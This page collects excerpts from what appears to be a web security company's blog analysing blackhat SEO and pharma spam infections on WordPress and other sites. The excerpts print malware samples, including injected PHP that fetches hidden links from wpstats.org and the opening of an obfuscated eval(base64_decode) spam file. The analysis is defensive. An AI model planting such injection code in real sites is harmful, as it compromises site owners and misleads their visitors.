SiteCheck – Got Blackhat SEO Spam Warning?

As of late it seems like we’re talking about a lot of SPAM related cases, this post will be no different.

Blackhat SEO

Before you start, let me preface this by saying that clearing a Blackhat SEO Spam injection is probably the biggest PITA (Google It) infection there is. They constantly evolve, making them difficult to detect and they employ both new and old techniques that, even after years, still prove to be annoying. This post will demonstrate one such case.

Read More

Pharma Hack Backdoor Analyzed – PHP5.PHP

Some of you might remember my last Pharma hack post, Intelligent (Pharma) SPAM Decoded, today I will spend some time looking a different variant of the same infection type but focus on a payload that is not encoded or embedded within an existing file, instead it resides in its own file – PHP5.php.

“Hmm, maybe it’s a good / system file, it does have PHP in it, I won’t bother looking at it…”

If you have ever come across this file and find yourself thinking this, we highly encourage you not to and take a minute to see if any of its components resemble what we’re about to share.

Dissecting the Payload


Read More

Wpstats. org Spam and a Fake Advanced Search Plugin

If you are seeing hidden links in your WordPress site, it could be coming from wpstats.org. On some blackhat spam cases we are analysing, the following code was added to the theme header of the compromised site:

if(function_exists(‘curl_init’)) { $url = "http://www.wpstats.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data”; }

If you are not familiar with PHP, this code will contact www.wpstats.org/jquery-1.6.3.min.js, which will return a long list of hidden links to be included on your site (not visible on a normal browser).

Read More

Website Cross-contamination: Blackhat SEO Spam Malware

We recently posted about Website Cross-Contamination which we see quite a bit of in shared hosting environments. This post is a follow up with a nice sample of an SEO Spam infection that uses multiple sites in a shared environment to push their campaign.

We received a clean up request from a customer who was clearly infected with Blackhat SEO Spam:

Read More

Intelligent (Pharma) Spam Decoded

We are seeing a rise in the use of intelligent SPAM – a.k.a Pharma Hack – across a number of platforms. We recently found a nice injection that made us salivate, we figured you’d be just as interested

It is of no surprise to us that attackers are always looking for ways to trick us and more importantly our users. This gem of a find was no different.

SPAM = “Stupid, Pointless Annoying Message”.

SPAM, in the form of unsolicited e-mail messages, is a problem that we face every day.  Imagine sending a client a link to a newly released product, they get to the page, and BAM they’re greeted with advertisements for pharmaceutical products (Viagra / Cialis / Male Enhancers). What do you think the impact would be?
Read More

DreamHost Security Issue Prompts FTP Password Resets

Yesterday on the DreamHost Status Blog, it was announced that all shell/FTP passwords would be reset due to what looks to be a security breach that was discovered on one of the DreamHost database servers.

DreamHost Security BreachDreamHost looks to have done a great job notifying affected customers via the update page, keeping them up-to-date throught out the day until the issue was resolved. It looks like all FTP passwords were indeed reset.

We recommend that all DreamHost customers log into to their accounts and check their account status. It is encouraged that you change your account passwords, and it wouldn’t hurt to change your FTP and database passwords again just to make sure.

Read More

Funny Spammers: Any Reproduction of This Document in Part or in Whole is Strictly Prohibited

Spam is nothing new, but a recent site we were reviewing was a bit different. After a bit of analysis, we found a file called tracks.php that was generating spam with the following code on it:

<?php // Any reproduction of this document in part or in whole is strictly prohibited. For educational purposes only. 1993-2011 (c)
error_reporting(0) ;eval ( base64_decode("JGxMOXdGMWFZNHpYNmpUMWdUNmdRN2xPMG..


Read More

Mass Spam Infection From Wplinksforwork Dot Com (50k+ WordPress Sites Hacked)

Last year we spoke about the siteurlpath blackhat SEO attack that was infecting many WordPress sites with spam.

But, how many? We had no clue at the time. Today, we decided to check on Google and it seems that almost 50k (yes, fifty thousand sites) were compromised, at minimum…

How do we know this? Well, the attack consists of contacting the domain wplinksforwork.com to get a list of links to be displayed on the compromised sites. However, that domain has been down for the last few days and all the sites compromised (if they have display errors enabled), have this message in their footer:

Warning: file_get_contents(http://wplinksforwork.com/56132.. 47509328/p.php?host=… failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in ..


Read More

Mass Compromise of Sites at gogvo.com – SEO Spam

A regular topic of discussion the past few months has been the basicpills link injection (a type of blackhat seo spam) on WordPress sites.

If you are not familiar with it, thousands of sites have been infected with basicpills which injects a ton of spammy pharma links all over compromised site (It infiltrates WordPress and attacks the wp-posts table).

So what’s that have to do with gogvo.com getting compromised? Well, in the past, the attackers would inject links directing to 247pharmaceutical.com or amoxilpharm.com, sometimes something else but similar. The seem to have changed tactics, now they are injecting links to an image directory, like:

Read More

Host4africa Mass Compromise

We are seeing a lot of sites hosted at host4africa.com compromised with Blackhat Spam SEO. Most of them are in the .co.za TLD (at 74.53.0.0/16 and 74.54.0.0/16) and have hidden links to generic drugs (common Pharma Spam).

When you on click on links added to the compromised sites you are redirected to a Pharma page, like this one:

The number of sites compromised is pretty large. Here are some we identified on one site:

Read More